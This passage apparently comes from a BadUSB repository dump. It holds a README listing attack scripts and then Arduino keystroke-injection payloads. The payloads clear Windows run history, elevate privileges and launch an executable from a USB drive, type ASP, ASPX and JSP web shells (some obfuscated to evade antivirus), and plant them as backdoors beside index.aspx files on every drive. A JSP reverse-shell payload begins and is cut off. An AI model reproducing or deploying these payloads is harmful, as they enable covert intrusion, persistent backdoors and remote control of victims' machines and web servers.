AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino\n     │      AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino\n     │      AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino\n     │      AspxSentenceTrojanWrite(webServerVersion).ino\n     │      JspSentenceTrojanWritten (JSP_websiteServerUse).ino\n     │      JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino\n     │      PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino\n     │      PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino\n     │      PHP_TrojanWrite(usedByPHP_websiteServer).ino\n     │      \n     ├─SpecificFunctionCode\n     │      AddUserCode(Tools).ino\n     │      Alt-f4_Loop.ino\n     │      ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino\n     │      EnablePSL_RemoteConnection(Tools).ino\n     │      ForcedDeletionOf360Processes(Tools).ino\n     │      ForceShutDownCommand(Tool).ino\n     │      Hide_CMD_Window(Display).ino\n     │      MouseKeepsMoving(Tools).ino\n     │      OpenPort445.ino\n     │      OpenSpecified_webPage.ino\n     │      ShiftBackdoor.ino\n     │      SimplyChangeAllUsersPasswords(TrickItem).ino\n     │      SimplyShutDownMachine(TrickItem).ino\n     │      TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino\n     │      \n     ├─TrojanDownloader\n     │  ├─CERTUTIL_DownLoader\n     │  │      CERTUTIL_DownLoader_MSF.ino\n     │  │      \n     │  ├─FTP_DownLoader\n     │  │      FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino\n     │  │      \n     │  ├─JAVA_DownLoader\n     │  │      JavaTrojanWrite(TargetEnvironmentRunJava).ino\n     │  │      server.java\n     │  │      \n     │  ├─PSL_DownLoader\n     │  │      Downloa_PSL_Trojan-Execute_aSecondTime.ino\n     │  │      LinkServer_MSF_PSL_Download.ino\n     │  │      LinkServer_PSL_Download.ino\n     │  │      PSL_DownLoader0.ino\n     │  │      PSL_DownLoader1.ino\n     │  │      PSL_DownLoader2.ino\n     │  │      PSL_DownLoader3.ino\n     │  │      PSL_DownLoader4.ino\n     │  │      PSL_Downloader_Win&Linux_General.ino\n     │  │      PSL_Writes_Bounces.ino\n     │  │      \n     │  └─PY_DownLoader\n     │          PyShellServer.py\n     │          Py_TrojanWrite(TargetEnvironmentRunPython).ino\n     │          \n     ├─Ubuntu_InformationGathering\n     │      BasicTerminalCommandsForUbuntu(Display).ino\n     │      UbuntuInformationCollectionTXT_File(Information).ino\n     │      \n     ├─WiFi_ConnectionTrojan\n     │      ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino\n     │      \n     └─WiFi_PasswordAcquisition\n             WiFiPasswordCapture(tool).ino\n             WiFiPasswordExport(tool).ino\n        \n### Demo<br>\n[Video address](https://www.yuque.com/u12074055/gzgwfh/dg804t) <br>\nVideo: [Hardware Hacker] Control the upload through WiFi to execute, run, write HID scripts for BADUSB as well as a small extra 1<br>\nVideo: [Hardware Hacker] Control the upload via WiFi to execute, run, and write HID scripts for BADUSB as well as a small extra 2<br>\nVideo: [BADUSB Demo] U Drive Attack: Ignore any kill soft, hack your computer in 3 seconds!<br>\nVideo: [BADUSB Demo] Invading Square Large Screen, with Tutorial 1<br>\nVideo: [BADUSB Demo] Invading Square Large Screen, with Tutorial 2<br>\nVideo: [BADUSB demo] BADUSB implementation record keyboard<br>\nVideo: [BADUSB demo] Change the password of the account used + close the system process + blue screen test<br>\n![演示](https://upload-images.jianshu.io/upload_images/11477676-31390e8446540ca3.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Advanced<br>\n[Video address](https://www.yuque.com/u12074055/cpuceb/dm1veu) <br>\nVideo: Badusb&MSF linkage<br>\nVideo: Start BadUSB with Nethunter<br>\n![进阶](https://upload-images.jianshu.io/upload_images/11477676-cc6c47da713ac2e2.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Frequently asked questions and errors<br>\n[Video address](https://www.yuque.com/u12074055/cpuceb/uofha2) <br>\nVideo: BadUSB code writes exception handling<br>\n![常见问题和错误](https://upload-images.jianshu.io/upload_images/11477676-0c90a8004d5e5420.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### extension<br>\n[Video address](https://www.yuque.com/u12074055/cpuceb/hs3n7p) <br>\nVideo: [Hardware Hacker] Nine dollars to make a BadUSB<br>\nVideo: [Hardware Hacker] can directly replace Big Yellow Duck and Wifiducky's new BadUSB<br>\nVideo: BadUSB Tutorial Digispark + Chinese BadUSB<br>\n![扩展](https://upload-images.jianshu.io/upload_images/11477676-bba7de72abd2072d.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Update<br>\n###### 2021.02.06 update code, part of which is the open source code searched from other enthusiasts, part of which is the method flow linked with MSF and the Arduino Leonardo basic key code that I think is better to use<br>\n###### 2021.02.14 update code, gain inspiration from other good project, join the trojans, DNS hijacking CobaltStrike linkage code, Linux and osx reverse shell, WIFI connection trojans, built-in WIFI password access, website a word invasion code, PSL full-screen hacked images, running programs in the U dish _ for expanding the scope of the invasion, and realize a lot of practical function code, the valentine day is joyful!<br>\n![更新](https://upload-images.jianshu.io/upload_images/11477676-a54932b08d3ef2da.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Link<br>\nThe code has been uploaded to GitHub and Gitee, **beg star**, other projects are also very fun, **continue to beg star**.<br>\n\n**GitHub：** https://github.com/wangwei39120157028/BadUSB<br>\n\n**Gitee：**  https://gitee.com/wwy2018/BadUSB<br>\n"
  },
  {
    "path": "RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRun/UdiskRun.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd /k reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\");\n  delay(500);\n  Keyboard.println(\"for /f %a in (\\'wmic volume get driveletter^,label ^| Find \\\"LEMONC\\\"\\') do (set ab=%a)\");\n  delay(100);\n  Keyboard.println(\"copy /y %ab%\\\\x.exe %tmp%&%tmp%\\\\x.exe&exit\");\n  delay(1000);\n    Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"powershell -c start-process -Filepath cmd \\' /k reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\\'-verb runas\");\n  delay(3000);\n Keyboard.press(KEY_LEFT_ALT);\n Keyboard.print('y');\n Keyboard.release(KEY_LEFT_ALT);\n delay(1000);\n Keyboard.println(\"for /f %a in (\\'wmic volume get driveletter^,label ^| Find \\\"LEMONC\\\"\\') do (set ab=%a)\");\n delay(500);\n Keyboard.println(\"copy /y %ab%\\\\x.exe %tmp%&%tmp%\\\\x.exe&exit\");\n Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv2/UdiskRunv2.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /K REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F\");\n  delay(500);\n  Keyboard.println(\"POWERSHELL -C START-PROCESS -fILEPATH CMD -VERB RUNAS&TASKKILL /F /IM CMD.EXE\");\n  delay(1000);\n  Keyboard.press(KEY_LEFT_ALT);\n  for(int i=0;i<100;i++){\n    delay(10);\n    Keyboard.print('y');\n  }\n   Keyboard.release(KEY_LEFT_ALT);\n delay(1000);\n  Keyboard.println(\"FOR /F %A IN (\\'WMIC VOLUME GET DRIVELETTER^,LABEL ^| fIND \\\"lemonc\\\"\\') DO (SET AB=%A)\");\n  delay(300);\n  Keyboard.println(\"%AB%\\\\X.EXE&&TASKKILL /F /IM CMD.EXE\");\n Keyboard.press(KEY_CAPS_LOCK);\n Keyboard.release(KEY_CAPS_LOCK);\n Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n  \n}\n"
  },
  {
    "path": "RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv3/UdiskRunv3.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /c REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&POWERSHELL -C START-PROCESS -fILEPATH CMD -VERB RUNAS\");\n  delay(1500);\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('y');\n  Keyboard.release(KEY_LEFT_ALT);\n delay(1000);\n  Keyboard.println();\n  delay(300);\n  Keyboard.println(\"FOR /F %A IN (\\'WMIC VOLUME GET DRIVELETTER^,LABEL ^| fIND \\\"lemonc\\\"\\') DO (SET AB=%A)\");  //lemonc可替换\n  delay(300);\n  Keyboard.println(\"%AB%\\\\X.EXE&&TASKKILL /F /IM CMD.EXE\");\n Keyboard.press(KEY_CAPS_LOCK);\n Keyboard.release(KEY_CAPS_LOCK);\n Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{ \n}\n"
  },
  {
    "path": "Site_AWord_IntrusionCode/AspSentenceTrojanWrite(webServerVersion).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println('echo ^<%eval request(\"wwy\")%^> >> hacked.asp');  //向hacked.asp写内容,密码wwy\n  delay(200); \n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<% >> hacked.asp\");  //向hacked.asp写内容,密码z\n  delay(200); \n  Keyboard.println(\"echo Function MorfiCoder(Code) >> hacked.asp\");\n  delay(200); \n  Keyboard.println(\"echo MorfiCoder=Replace(Replace(StrReverse(Code),'/*/',''''),'\\*\\',vbCrlf) >> hacked.asp\");\n  delay(200); \n  Keyboard.println(\"echo End Function >> hacked.asp\");\n  delay(200); \n  Keyboard.println('echo Execute MorfiCoder(\")/*/z/*/(tseuqer lave\") >> hacked.asp');\n  delay(200); \n  Keyboard.println(\"echo %^> >> hacked.asp\");\n  delay(200); \n\n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<%@ LANGUAGE = VBScript.Encode %^> >> hacked.asp\");  //向hacked.asp写内容,密码wwy\n  delay(200); \n  Keyboard.println('echo ^<%#@~^PgAAAA==~b0~\"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%^> >> hacked.asp');  //向hacked.asp写内容,密码c\n  delay(200); \n\n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<%@ Page Language = Jscript %^> >> hacked.aspx\");  //向hacked.aspx写内容,密码-7\n  delay(200);\n  Keyboard.println(\"echo ^<%var/*-/*-*/P/*-/*-*/=/*-/*-*/'e'+'v'+/*-/*-*/ >> hacked.aspx\");\n  delay(200);\n  Keyboard.println(\"echo 'a'+'l'+'('+'R'+'e'+/*-/*-*/'q'+'u'+'e'/*-/*-*/+'s'+'t'+ >> hacked.aspx\");\n  delay(200);\n  Keyboard.println(\"echo '[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]'+ >> hacked.aspx\");\n  delay(200);\n  Keyboard.println(\"echo ','+'\\''+'u'+'n'+'s'/*-/*-*/+'a'+'f'+'e'+'\\''+')';eval >> hacked.aspx\");\n  delay(200);\n  Keyboard.println(\"echo (/*-/*-*/P/*-/*-*/,/*-/*-*/'u'+'n'+'s'/*-/*-*/+'a'+'f'+'e'/*-/*-*/);%^> >> hacked.aspx\");\n  delay(200);\n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println('echo ^<%@ Page Language=\"Jscript\"%^>^<%eval(Request.Item[\"wwy\"],\"unsafe\");%^> >> hacked.asp');  //向hacked.asp写内容,密码wwy\n  delay(200); \n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/JspSentenceTrojanWritten (JSP_websiteServerUse).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println('echo ^<%@page import=\"java.lang.*\"%^>  >> hacked.jsp');  //向hacked.jsp写内容，这是一种jsp常见的一句话跳板木马，http://localhost/1.jsp?f=1.txt&t=hacker ，然后:http://localhost/1.txt 就出来了 内容为hacker，便于挂jsp大马\n  delay(200); \n  Keyboard.println(\"echo ^<%  >> hacked.jsp\");\n  Keyboard.println('echo if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.getRealPath(\"\\\")+request.getParameter(\"f\"))).write(request.getParameter(\"t\").getBytes());  >> hacked.jsp');\n  Keyboard.println(\"echo %^> >> hacked.jsp\");\n\n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入jsp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println('echo ^<%@page import=\"java.lang.*\"%^>  >> hacked.jsp');  //向hacked.jsp写内容\n  delay(200); \n  Keyboard.println('echo ^<%@page import=\"java.util.*\"%^>  >> hacked.jsp');\n  delay(200); \n  Keyboard.println('echo ^<%@page import=\"java.io.*\"%^>  >> hacked.jsp');\n  delay(200); \n  Keyboard.println('echo ^<%@page import=\"java.net.*\"%^>  >> hacked.jsp');\n  delay(200); \n  Keyboard.println(\"echo ^<%  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   class StreamConnector extends Thread  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     InputStream ep;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     OutputStream wk;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     StreamConnector( InputStream ep, OutputStream wk )  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       this.ep = ep;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       this.wk = wk;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     }  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     public void run()  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       BufferedReader lv  = null;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       BufferedWriter gih = null;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       try  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         lv  = new BufferedReader( new InputStreamReader( this.ep ) );  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         gih = new BufferedWriter( new OutputStreamWriter( this.wk ) );  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         char buffer[] = new char[8192];  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         int length;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         while( ( length = lv.read( buffer, 0, buffer.length ) ) > 0 )  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo           gih.write( buffer, 0, length );  >> 